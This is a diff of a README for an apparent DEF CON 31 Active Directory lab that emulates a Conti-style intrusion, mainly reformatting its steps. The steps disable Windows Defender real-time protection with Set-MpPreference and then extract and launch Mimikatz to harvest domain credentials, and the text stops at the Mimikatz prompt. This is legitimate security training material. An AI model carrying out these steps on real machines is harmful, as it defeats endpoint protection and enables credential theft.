arosenmund/defcon_31_ad_good_bad_lolWut/1_ad_credential_grabbing/1_credentual_grabbing/README.md

     ![](dc31-conti_playbook.png)

-In this case, the TA has accessed the environment using a local Administrator account.
+In this case, the TA has accessed the environment using a local admin account.
 This account does not have LDAP query permissions.
 Thus, the TA needs to obtain access to a domain account.

 Let's access some credentials!

 1. Open PowerShell as Administrator

     1. Start menu -> Type `powershell` -> Right-click on "Windows PowerShell" and select "Run as administrator"

         1. Do _not_ use "PowerShell 7 (x64)" or double-click "PowerShell 7" on the desktop, as we do not want PS7/Core

     1. Click "Yes" on the UAC prompt

-1. Disable Windows Defender:
+1. Disable Windows Defender (WD):

-    1. `Set-MpPreference -DisableRealtimeMonitoring 1`
+    ```powershell
+    Set-MpPreference -DisableRealtimeMonitoring 1
+    ```

+    **Hey!** Did you do this step?
+If not, do it.
+Otherwise you won't be able to run Mimikatz.
+And yes, this is a beyond common way of disabling WD.
+Technically, WD is not being disabled, just the real-time protection feature, but this is all you need to do to get away with most shenanigans.

 1. Extract Mimikatz:

-    1. `cd c:\Users\Public\Desktop\LAB_FILES\assets`
-    1. `expand-archive mimikatz_trunk.zip`
+    ```powershell
+    cd c:\Users\Public\Desktop\LAB_FILES\assets
+    expand-archive mimikatz_trunk.zip
+    ```

 1. Run mimikatz meow:

-    1. `cd .\mimikatz_trunk\x64\`
-    1. `.\mimikatz.exe`
+    ```powershell
+    cd .\mimikatz_trunk\x64\
+    .\mimikatz.exe
+    ```

 1. At the Mimikatz prompt (`mimikatz #`), run the following commands: